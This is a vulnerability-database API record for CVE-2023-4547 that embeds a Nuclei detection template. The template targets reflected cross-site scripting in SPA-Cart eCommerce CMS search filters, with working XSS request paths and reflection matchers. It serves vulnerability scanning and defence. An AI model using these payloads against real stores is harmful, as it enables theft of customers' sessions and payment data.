{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-4547/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-4547/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-4547/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-4547/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-4547/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-4547"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-4547"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-4547.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2023-4547\n\ninfo:\n  name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting\n  author: theamanrawat,SoSpiRo\n  severity: medium\n  description: |\n    A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n  impact: |\n    Unauthenticated attackers can inject malicious JavaScript through search filter parameters, potentially stealing customer session cookies and payment information from the eCommerce platform.\n  remediation: |\n    Update SPA-Cart eCommerce CMS to a version newer than 1.9.0.3 that properly sanitizes filter parameters in the search functionality.\n  reference:\n    - https://spa-cart.com\n    - https://cxsecurity.com/ascii/WLB-2023080090\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-4547\n    - https://vuldb.com/?ctiid.238058\n    - https://vuldb.com/?id.238058\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2023-4547\n    cwe-id: CWE-79\n    epss-score: 0.6354\n    epss-percentile: 0.99175\n    cpe: cpe:2.3:a:spa-cart:ecommerce_cms:1.9.0.3:*:*:*:*:*:*:*\n  metadata:\n    verified: \"true\"\n    max-request: 2\n    vendor: spa-cart\n    product: ecommerce_cms\n  tags: cve,cve2023,spa-cart,unauth,xss,vuln\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331\"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'\n      - '{{BaseURL}}/search?filter[brandid]=vnxjb\"><script>alert(document.cookie)</script>bvu51'\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '100-1331\"><script>alert(document.cookie)</script>'\n          - '><script>alert(document.cookie)</script>bvu51'\n        condition: or\n\n      - type: word\n        part: body\n        words:\n          - '<table class=\"products-nav\">'\n\n      - type: word\n        part: header\n        words:\n          - 'text/html'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100c2d09d00f603c25992eb0278d5993762df8c48908882632984a24136397d5c9402201791cae6071ff45ff8160735237a7f3ee588459bbeec5392f0613bb835ffb670:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-4547"
}